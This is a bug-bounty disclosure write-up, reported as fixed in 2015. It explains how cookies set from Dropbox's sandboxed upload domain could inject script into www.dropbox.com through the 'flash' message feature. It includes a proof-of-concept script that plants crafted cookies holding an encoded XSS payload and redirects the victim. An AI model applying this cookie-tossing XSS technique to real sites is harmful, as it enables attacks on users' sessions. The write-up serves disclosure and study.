I think many people already knows that we can execute any JavaScript code without any filter by simply uploading a HTML file to Dropbox. But, the uploaded script is executed on a sandboxed domain, dl-web.dropbox.com, so we cannot easily steal any other user’s session.

What I want to point out here is that we can set any cookie for the global domain (.dropbox.com) since the sandboxed domain is also under the global domain even though we cannot directly access cookies on the main subdomain (www.dropbox.com). I thought it may be able to make something happen on www.dropbox.com through dl-web.dropbox.com.

Vulnerability

I found a some nice feature, Flash. It is a pop message appeared for 1-2 seconds, which is triggered by cookies. After cookies, “flash” and “bang”, are given, it draws a small message box containing a text written in cookie “flash”, and check the correctness of the ‘flash’ with cookie ‘bang’. The ‘bang’ seems like a hmac of “flash”. So, I need to find a correct “bang” value for my custom “flash”.

I also found an another function which unlinks a device in security setting page. When I unlink a some device, it shows me a flash message, which contains the unlinked device name. So, If I set any JavaScript code for a device name and unlink it, then it will generate a correct ‘flash’ and ‘bang’ value of the injected script.

Exploit

Now, I can make any flash messages with any text.

After uploading a HTML file that assigns the malicious cookies given from the device unlink function, make victim to click your page. The flash meesage will appear and attack the victim when the victim opens a dropbox web page.

1
2
3
4
5
6
7

<script>
document.cookie="bang=QUFEZGthYS1CaTNfWUpYcDUwdjNxemVHSHlhSHJkU3BEdnhKRUxOZVZ3b2ZoUQ%3D%3D;
Domain=dropbox.com; Path=/;";
document.cookie="flash=b2s6PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KGRvY3VtZW50LmRvbWFpbik%2BIHVubGlua
2VkIHN1Y2Nlc3NmdWxseS4%3D; Domain=dropbox.com; Path=/";
location.href="https://dropbox.com/forgot";
</script>

There is a CSP. But, the script can be executed on IE or Safari.

2015/05/02 Fixed, a bounty of $1,331